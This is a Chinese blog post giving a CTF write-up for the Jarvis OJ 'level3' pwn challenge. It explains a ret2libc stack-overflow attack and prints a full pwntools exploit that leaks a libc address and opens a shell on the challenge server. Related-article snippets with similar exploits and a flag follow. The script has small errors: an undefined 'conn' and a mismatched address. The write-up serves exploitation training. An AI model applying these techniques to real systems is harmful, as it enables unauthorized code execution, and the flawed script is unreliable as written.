Jarvis OJ level3 writeup

最新推荐文章于 2023-04-21 14:54:11 发布
最新推荐文章于 2023-04-21 14:54:11 发布
阅读量273 收藏
点赞数
分类专栏: pwn 栈溢出 ROP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43986365/article/details/95029178
版权
pwn 同时被 3 个专栏收录
19 篇文章 1 订阅
订阅专栏
栈溢出
6 篇文章 0 订阅
订阅专栏
ROP
5 篇文章 0 订阅
订阅专栏

这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。

拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下:
在这里插入图片描述
解压出两个文件:level3和libc-2.19.so
我们查看一下这两个文件的保护:
在这里插入图片描述
可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。
我们把level3放到IDA中查看一下程序逻辑:
在这里插入图片描述
我们可以看到vul()函数中含有write函数,但很可惜不能写入shell code再返回来执行,因为程序开启
了堆栈不可执行的保护。但是,write函数是libc函数,他在got表中和system函数的相对位置是不变的。
所以我们可以泄露write函数的真实地址,用来计算system函数的真实地址。

vulfun_addr=0x0804044B #这个可以从IDA中直接查出来
write_plt=e.symbols['write']
write_got=e.got['write']
payload='a'*0x88+'a'*4+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4) #这里属于延迟绑定机制。

之后把payload输入进去,再接收一下write的真实地址就可以了。
下面是完整的exp:

#! /usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com',9879)
libc=ELF('./libc-2.19.so')
e=ELF('./level3')
pad=0x88
vulfun_addr=0x0804844B
write_plt=e.symbols['write']
write_got=e.got['write']
payload1='A'*pad+"BBBB"+p32(write_plt)+p32(vulfun_addr)+p32(1)+p32(write_got)+p32(4)
p.recvuntil("Input:\n")
p.sendline(payload1)
write_addr=u32(conn.recv(4))
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=libc.search('/bin/sh').next()
system_addr=write_addr-libc_write+libc_system
sh_addr=write_addr-libc_write+libc_sh
payload2='A'*pad+"BBBB"+p32(system_addr)+'a'*4+p32(sh_addr)
p.sendline(payload2)
p.interactive()

下面是运行结果:
在这里插入图片描述

PLpa、
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Jarvis OJ--level3
Kni9hT's Blog
11-10 239
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
Jarvis OJ level1
Kni9hT's Blog
11-08 577
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
jarvis oj level3
weixin_44932880的博客
07-25 273
所需知识 先在终端用file命令查看文件为32位,在对应版本的IDA中打开 用checksec命令查看文件发现 栈无保护,再看伪代码分析可知 可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址 再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag 大致思路跟第二题是一样的, 但是不同点在于上一题可以直接在IDA里面获得函数syste...
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 159
BUUCTF 做题练习
【BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 343
【BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
jarvisoj level3
sun的博客
10-03 1011
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
JARVIS:用声音控制Windows程序
05-15
杰维斯 用您的声音控制Windows程序。 贡献 您可以随意派生此存储库,并使用键盘增强您想要的任何内容,思考和做魔术。 叉它 创建功能分支( git checkout -b xxxxx ) 提交更改( git commit -am 'Add some xxxxx...
jarvis3
02-17
"jarvis3" 是一个基于JavaScript的项目,很可能是一个智能助手或者聊天机器人的实现,名字可能源于《钢铁侠》电影中的AI系统贾维斯。在JavaScript领域,这样的项目通常涉及前端开发、Node.js后端服务,或者是用...
jarvisoj_level3
m0_52231248的博客
11-17 644
jarvisoj_level3 Checksec: Ida: 标准的ret2libc,offest=0x88+4 有write和read的plt地址 Exp: from pwn import* from LibcSearcher import* r=remote("node4.buuoj.cn",26088) elf=ELF('./level3') context.log_level = 'debug' payload=flat('a'*0x88+'bbbb') payload+=
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 763
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 286
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
Jarvis OJ_level3_入门栈溢出
Jc
07-11 329
附录:发现这个网站的题还是挺系统的,对于入门pwn的是挺好的一个选择 解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP
jarvis oj level3
CNXBDSa的博客
07-27 388
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
BUUCTF jarvisoj_level3
红叶的博客
10-27 328
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
[BUUCTF]PWN——jarvisoj_level3
BangSen1的博客
03-16 1242
jarvisoj_level3 32位,NX保护。 运行程序。 用IDA打开,shift+f12检索 ,找到关键函数。 参数buf溢出漏洞,利用ret2libc获取shell。 1,利用write函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil('
jarvisoj_level0
最新发布
08-14
- *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值